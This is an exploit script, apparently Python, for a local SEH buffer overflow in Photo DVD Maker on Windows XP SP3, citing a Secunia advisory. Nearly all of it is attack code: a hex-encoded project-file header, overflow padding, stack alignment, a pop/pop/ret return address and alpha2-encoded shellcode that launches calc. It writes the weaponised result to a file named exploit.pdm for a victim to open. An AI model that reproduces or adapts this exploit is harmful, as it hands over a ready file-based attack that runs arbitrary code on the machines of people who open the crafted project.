# _ _ _ __ _ _ _ #| || | (_) ___ / \ | |__ | | | #| __ | | | (_-< | () | | / / |_ _| #|_||_| |_| /__/ \__/ |_\_\ |_| # #[+] Bug : Photo DVD Maker (.pdm) Local Buffer Overflow Exploit (SEH) #[+] Refer : Secunia advisory 35709 #[+] Exploit : His0k4 #[+] Tested on : Windows XP (SP3) #[+] Description: The program filters some chars i haven't tried to list them... # So i decided directly to use the alpha2 tool #[+] Note : After generating the project file,convert it to UTF-8 without BOM and save #[+] Note2 : You have to open the exploit file from the program(file>open) header1 = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20" header1 += "\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a" header1 += "\x3c\x50\x68\x6f\x74\x6f\x5f\x44\x56\x44\x5f\x4d\x61\x6b\x65\x72\x5f\x50\x72\x6f" header1 += "\x6a\x65\x63\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x37\x2e\x30\x30\x22\x20" header1 += "\x61\x6c\x62\x75\x6d\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x74\x68\x75\x6d" header1 += "\x62\x6e\x61\x69\x6c\x5f\x73\x69\x7a\x65\x3d\x22\x38\x30\x22\x20\x61\x6c\x62\x75" header1 += "\x6d\x5f\x66\x69\x6c\x65\x5f\x74\x69\x6d\x65\x5f\x73\x74\x61\x6d\x70\x3d\x22\x30" header1 += "\x22\x20\x64\x69\x73\x6b\x5f\x66\x6f\x72\x6d\x61\x74\x3d\x22\x30\x22\x3e\x0a\x20" header1 += "\x20\x20\x20\x3c\x54\x65\x6d\x70\x5f\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x43" header1 += "\x3a\x5c\x44\x6f\x63\x75\x6d\x65\x6e\x74\x73\x20\x61\x6e\x64\x20\x53\x65\x74\x74" header1 += "\x69\x6e\x67\x73\x5c\x76\x69\x63\x74\x69\x6d\x5c\x4d\x79\x20\x44\x6f\x63\x75\x6d" header1 += "\x65\x6e\x74\x73\x5c\x50\x68\x6f\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72" header1 += "\x5c\x30\x39\x30\x37\x30\x36\x31\x31\x33\x36\x32\x37\x3c\x2f\x54\x65\x6d\x70\x5f" header1 += "\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x0a\x20\x20\x20\x20\x3c\x44\x56\x44\x5f" header1 += "\x4d\x65\x6e\x75\x20\x62\x6b\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d" header1 += "\x22\x31\x22\x20\x62\x6b\x5f\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22" header1 += "\x30\x22\x20\x65\x6e\x63\x6f\x64\x65\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x3e" header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x6d\x70\x6c" header1 += "\x61\x74\x65\x3e\x36\x34\x58\x6d\x61\x73\x2e\x78\x6d\x6c\x3c\x2f\x4d\x65\x6e\x75" header1 += "\x5f\x54\x65\x6d\x70\x6c\x61\x74\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c" header1 += "\x4d\x65\x6e\x75\x5f\x54\x69\x74\x6c\x65\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65" header1 += "\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e\x74\x3d\x22\x43\x61\x74\x61\x6e\x65\x6f\x20" header1 += "\x42\x54\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x66\x66\x22" header1 += "\x20\x73\x69\x7a\x65\x3d\x22\x33\x38\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20" header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65" header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x30\x31\x22\x20\x68\x65\x69" header1 += "\x67\x68\x74\x3d\x22\x34\x35\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73" header1 += "\x68\x61\x64\x6f\x77\x3d\x22\x31\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30" header1 += "\x78\x30\x65\x30\x61\x39\x64\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x32\x22\x20" header1 += "\x78\x30\x3d\x22\x36\x30\x22\x20\x79\x30\x3d\x22\x37\x35\x22\x3e\x4d\x79\x20\x50" header1 += "\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75\x6d\x3c\x2f\x4d\x65\x6e\x75\x5f\x54\x69\x74" header1 += "\x6c\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63\x6b\x67\x72\x6f" header1 += "\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22\x3e\x43\x3a\x5c" header1 += "\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f\x74\x6f\x20" header1 += "\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73\x69\x6f\x6e" header1 += "\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e\x6d\x70\x33" header1 += "\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x3e\x0a" header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64\x65\x5f\x49\x6e\x66\x6f" header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x44\x56\x44\x5f\x4d\x65\x6e\x75\x3e\x0a\x20" header1 += "\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x20\x64\x65\x6c" header1 += "\x65\x74\x65\x5f\x74\x65\x6d\x70\x6c\x61\x74\x65\x5f\x66\x69\x6c\x65\x3d\x22\x31" header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f" header1 += "\x44\x69\x73\x6b\x4d\x65\x6e\x75\x5f\x44\x61\x74\x61\x20\x67\x72\x61\x79\x5f\x73" header1 += "\x63\x61\x6c\x65\x3d\x22\x30\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x6d\x65\x6e" header1 += "\x75\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f" header1 += "\x61\x6c\x62\x75\x6d\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69" header1 += "\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20" header1 += "\x76\x69\x73\x69\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x74\x68\x75\x6d\x62\x6e" header1 += "\x61\x69\x6c\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x70\x61\x67\x65" header1 += "\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20\x62\x46\x69\x78\x65\x64\x44\x75\x72" header1 += "\x61\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x64\x77\x44\x56\x44\x4d\x65\x6e\x75\x44" header1 += "\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x22\x20\x75\x73\x65\x5f\x64\x76\x64" header1 += "\x5f\x6d\x65\x6e\x75\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6d\x6f\x64\x65\x3d" header1 += "\x22\x32\x22\x20\x70\x6c\x61\x79\x5f\x73\x6c\x69\x64\x65\x73\x68\x6f\x77\x5f\x61" header1 += "\x66\x74\x65\x72\x5f\x70\x6c\x61\x79\x69\x6e\x67\x5f\x6d\x65\x6e\x75\x3d\x22\x31" header1 += "\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73" header1 += "\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x20\x6a\x6f\x6c\x69\x65\x74\x3d\x22\x31\x22" header1 += "\x20\x73\x61\x76\x65\x5f\x6f\x72\x69\x67\x69\x6e\x61\x6c\x5f\x66\x69\x6c\x65\x73" header1 += "\x3d\x22\x30\x22\x20\x73\x61\x76\x65\x5f\x65\x78\x74\x72\x61\x5f\x66\x69\x6c\x65" header1 += "\x73\x3d\x22\x30\x22\x20\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x3d\x22\x43\x6f\x70" header1 += "\x79\x72\x69\x67\x68\x74\x28\x63\x29\x20\x76\x69\x63\x74\x69\x6d\x22\x20\x70\x75" header1 += "\x62\x6c\x69\x73\x68\x65\x72\x3d\x22\x76\x69\x63\x74\x69\x6d\x22\x20\x76\x6f\x6c" header1 += "\x75\x6d\x65\x6c\x61\x62\x65\x6c\x3d\x22\x50\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75" header1 += "\x6d\x20\x6f\x66\x20\x76\x69\x63\x74\x69\x6d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20" header1 += "\x20\x20\x20\x20\x20\x20\x3c\x4f\x50\x54\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65" header1 += "\x73\x20\x66\x69\x6c\x65\x73\x3d\x22\x30\x22\x20\x66\x6f\x6c\x64\x65\x72\x3d\x22" header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x4f\x50\x54" header1 += "\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65\x73\x3e\x0a\x20\x20\x20\x20\x20\x20\x20" header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x3e" header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x54\x56" header1 += "\x5f\x44\x61\x74\x61\x20\x70\x61\x6c\x3d\x22\x30\x22\x20\x63\x6f\x72\x72\x65\x63" header1 += "\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x63\x72\x6f\x70\x3d\x22\x35\x22\x20\x63\x72" header1 += "\x6f\x70\x5f\x65\x6e\x61\x62\x6c\x65\x3d\x22\x30\x22\x20\x61\x6e\x74\x69\x66\x6c" header1 += "\x69\x63\x6b\x3d\x22\x31\x22\x20\x70\x68\x6f\x74\x6f\x5f\x73\x63\x61\x6c\x65\x5f" header1 += "\x6d\x6f\x64\x65\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c" header1 += "\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x52\x65\x63\x6f\x72\x64\x65\x72\x5f\x44\x61\x74" header1 += "\x61\x20\x65\x6e\x61\x62\x6c\x65\x5f\x62\x75\x72\x6e\x5f\x70\x72\x6f\x6f\x66\x3d" header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x62\x75\x72\x6e\x5f\x64\x76\x64\x3d" header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x64\x69\x73\x63\x5f\x69\x6d\x61\x67" header1 += "\x65\x3d\x22\x30\x22\x20\x73\x68\x75\x74\x64\x6f\x77\x6e\x3d\x22\x30\x22\x20\x69" header1 += "\x73\x6f\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x3d\x22\x22\x20\x63\x6f\x70\x69" header1 += "\x65\x73\x3d\x22\x31\x22\x20\x64\x72\x69\x76\x65\x72\x5f\x6d\x6f\x64\x65\x3d\x22" header1 += "\x30\x22\x20\x63\x64\x5f\x77\x72\x69\x74\x69\x6e\x67\x5f\x6d\x6f\x64\x65\x3d\x22" header1 += "\x30\x22\x20\x73\x69\x6d\x75\x6c\x61\x74\x65\x5f\x77\x72\x69\x74\x69\x6e\x67\x3d" header1 += "\x22\x31\x22\x20\x73\x70\x65\x65\x64\x3d\x22\x2d\x31\x22\x2f\x3e\x0a\x20\x20\x20" header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x3e\x0a\x20\x20\x20" header1 += "\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x44\x61\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20" header1 += "\x74\x79\x70\x65\x3d\x22\x73\x74\x69\x6c\x6c\x69\x6d\x61\x67\x65\x22\x20\x6e\x61" header1 += "\x6d\x65\x3d\x22\x22\x20\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31" header1 += "\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x6f\x6e\x65\x3d\x22\x32\x22" header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x74\x77\x6f\x3d\x22\x32\x22\x20" header1 += "\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x79\x70\x65\x3d\x22\x30\x22\x20\x62\x6b" header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30\x22\x20\x61\x75" header1 += "\x74\x6f\x5f\x70\x61\x6e\x5f\x7a\x6f\x6f\x6d\x3d\x22\x31\x22\x20\x6d\x75\x73\x69" header1 += "\x63\x5f\x66\x61\x64\x65\x5f\x69\x6e\x5f\x6f\x75\x74\x3d\x22\x31\x22\x20\x62\x6b" header1 += "\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x73\x70\x72" header1 += "\x69\x74\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x65\x6e\x63\x6f\x64\x65" header1 += "\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6f\x76\x65\x72" header1 += "\x5f\x63\x75\x72\x72\x65\x6e\x74\x5f\x73\x6f\x6e\x67\x3d\x22\x30\x22\x20\x74\x72" header1 += "\x61\x6e\x73\x69\x74\x69\x6f\x6e\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x6e" header1 += "\x6f\x6e\x65\x5f\x74\x72\x61\x6e\x73\x3d\x22\x30\x22\x3e\x0a\x20\x20\x20\x20\x20" header1 += "\x20\x20\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x54\x68\x65\x6d\x65\x20\x6e\x61\x6d\x65" header1 += "\x3d\x22\x5f\x6e\x6f\x5f\x74\x68\x65\x6d\x65\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20" header1 += "\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x54\x69\x74\x6c\x65\x20\x45\x6e\x61\x62" header1 += "\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67\x3d\x22\x22\x20\x63\x6f" header1 += "\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b\x5f\x63\x6f\x6c\x6f\x72" header1 += "\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22\x20\x45\x66\x66\x65\x63" header1 += "\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x30\x22\x2f\x3e\x0a" header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x43\x72\x65\x64\x69" header1 += "\x74\x20\x45\x6e\x61\x62\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67" header1 += "\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b" header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22" header1 += "\x20\x45\x66\x66\x65\x63\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d" header1 += "\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64" header1 += "\x65\x5f\x46\x69\x6c\x65\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x41\x6c" header1 += "\x62\x75\x6d\x5f\x49\x6d\x61\x67\x65\x20\x69\x64\x3d\x22\x30\x22\x3e\x5a\x3a\x5c" header1 += "\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x2e\x4a\x50\x47\x3c\x2f\x41\x6c\x62\x75\x6d" header1 += "\x5f\x49\x6d\x61\x67\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63" header1 += "\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22" header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x30\x30\x30\x22\x20\x73\x74" header1 += "\x61\x72\x74\x3d\x22\x30\x22\x20\x65\x6e\x64\x3d\x22\x34\x30\x30\x30\x30\x22\x20" header1 += "\x6f\x66\x66\x73\x65\x74\x5f\x69\x6e\x5f\x74\x72\x61\x63\x6b\x3d\x22\x30\x22\x3e" header1 += "\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f" header1 += "\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73" header1 += "\x69\x6f\x6e\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e" header1 += "\x6d\x70\x33\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69" header1 += "\x63\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x78" header1 += "\x74\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e" header1 += "\x74\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30" header1 += "\x22\x20\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20" header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65" header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x30\x22\x20\x68\x65\x69\x67\x68" header1 += "\x74\x3d\x22\x30\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73\x68\x61\x64" header1 += "\x6f\x77\x3d\x22\x30\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30" header1 += "\x30\x30\x30\x30\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x78\x30\x3d" header1 += "\x22\x30\x22\x20\x79\x30\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20" header1 += "\x20\x3c\x53\x75\x62\x74\x69\x74\x6c\x65\x5f\x46\x6f\x6e\x74\x20\x66\x69\x6c\x65" header1 += "\x3d\x22\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x46\x6f\x6e\x74\x73\x5c\x61" header1 += "\x72\x69\x61\x6c\x2e\x74\x74\x66\x22\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x22\x69" header1 += "\x73\x6f\x2d\x38\x38\x35\x39\x2d\x31\x22\x20\x73\x69\x7a\x65\x3d\x22\x33\x32\x22" header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6d\x61\x67\x65\x5f\x44\x61" header1 += "\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20\x61\x6e\x67\x6c\x65\x3d\x22\x30\x22\x20" header1 += "\x74\x72\x61\x6e\x73\x3d\x22\x42\x6f\x78\x20\x57\x69\x70\x65\x20\x2d\x20\x54\x2e" header1 += "\x20\x74\x6f\x20\x4c\x2e\x5b\x54\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x4c\x69\x62" header1 += "\x5d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x46\x69\x6c" header1 += "\x65\x5f\x4e\x61\x6d\x65\x3e\x43\x3a\x5c" header2 = "\x2e\x4a\x50\x47\x3c\x2f\x46\x69\x6c\x65\x5f\x4e\x61\x6d\x65\x3e\x0a\x20\x20\x20" header2 += "\x20\x20\x20\x20\x20\x3c\x2f\x49\x6d\x61\x67\x65\x5f\x44\x61\x74\x61\x3e\x0a\x20" header2 += "\x20\x20\x20\x3c\x2f\x41\x6c\x62\x75\x6d\x5f\x44\x61\x74\x61\x3e\x0a\x3c\x2f\x50" header2 += "\x68\x6f\x74\x6f\x5f\x44\x56\x44\x5f\x4d\x61\x6b\x65\x72\x5f\x50\x72\x6f\x6a\x65" header2 += "\x63\x74\x3e" payload = header1 payload += "\x41"*257 #align esp payload += "\x61"*4 #popad payload += "\x56\x29\xD1\x72" # printable p/p/r msacm32.drv (xp/sp3) payload += "\x21" #making a "Not taken jump" payload += "\x61"*39 #popad payload += "\x4C"*4 #dec esp payload += "\x41"*4 #padding #win32_exec calc -encoded with alpha2 zero tolerance => 741 bytes payload += ( "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIzK7sciJKd" "EYxzXIoKOio0OPIRiqY2ig9syRq0ZsfSdQHvVVStp66Rxp4cqFPRbP6pHbhTp" "QRTs6PpB2cpVRxwBsr2d721XgDra7BQQqTdpw1pDbtqRStrq724p1QStRaqFP" "Xp4qJ7HSrRdszpOpM0NPO3zpNaVV4QRRpw2P0crTppKG8QUw4pN3spK5hbnqW" "Suv00J1GrapPpOpNrkfXRoSdPJpQ2kgHPOPUpBpRaQvPPKbnsyWDpKDxSvecp" "KW8g12p0PrnraaSw2pLRipIPNszaVpXaRPLW6QGqWp0SqpLPL2lrmrpcq4p74" "RlRkbnrf0O2kTsQVduRfRbW6fPsu5g3uPN0KsxroSusv3bW1bpPKrn1XVVBkV" "XpNRpbkQDBkQX2opEpNPQ1Qf0PKpNRkcxpNtq0KbxQQtppKbnrirxrnpUW6f2" "sv0P1Sblg163g2PLQV4vpKsh1RPTQRBs0Eg8srpLPJRwrnPPPKPHsrw4PNFP2" "kpXW2pWPNRqRmQZ0KRhpJrfrjbp0Krn3ytppKRhPBuhCr0KpBPP1R60srrpBk" "UhPJQV0N5cPO4uqQp3QXroqR2fQXsuPIQXqZRoSs7H2b0L2k0WQRSuRj6VBbp" "ORltxcvp0BoSepJqFqZtybppOpLPXRpPP2gruropOw7Bn1SrvraRfpNBvQS0V" "crpPsjTJA") payload += header2 try: out_file = open("exploit.pdm","w") out_file.write(payload) out_file.close() print("\nExploit file created!\n") except: print "Error"